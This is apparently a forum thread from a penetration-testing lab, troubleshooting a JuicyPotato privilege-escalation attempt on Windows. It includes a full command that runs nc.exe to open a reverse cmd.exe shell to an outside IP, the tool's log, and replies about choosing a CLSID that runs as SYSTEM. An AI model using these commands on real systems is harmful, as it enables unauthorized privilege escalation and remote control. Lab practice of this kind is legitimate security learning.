so i have compiled Juicypotato to work with x86
but when i run
.\j.exe -l 1338 -p c:\tmp\nc.exe -a “-e cmd.exe 10.10.14.68 443” -t * -c “{A47979D2-C419-11D9-A5B4-001185AD2B89}”
i have no shell
even if i run
.\j.exe -p c:\windows\system32\cmd.exe -t * -l 1338 -c “{A47979D2-C419-11D9-A5B4-001185AD2B89}”
i stay in USER MODE, no privileges
what might be the problem?
log from Juicypotato :
Testing {A47979D2-C419-11D9-A5B4-001185AD2B89} 1338
…
[+] authresult 0
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE
The CLSID “{A47979D2-C419-11D9-A5B4-001185AD2B89}” you are trying to reflect is not running as local system but as local service.
Local service cannot create interactive windows out of Session 0. As far as i undersand you are running in Session != 0 as an interactive user so you can’t see any window created on your Session. Try to change the CLSID and be sure you choose one that is running as Local System.
Try forcing CreateProcessAsUser() call (-t u) you will get a semi working shell… but all this doesn’t make sense, why should you use a clisd which impersonates a local/network service ?
@talboris did you get juicypotato32 to work on devel? I’m having issues with BITS not being started/running and i think that is why is doesn’t work for me?
I’ve also tried with the CLSID for ShellHWDetection but no dice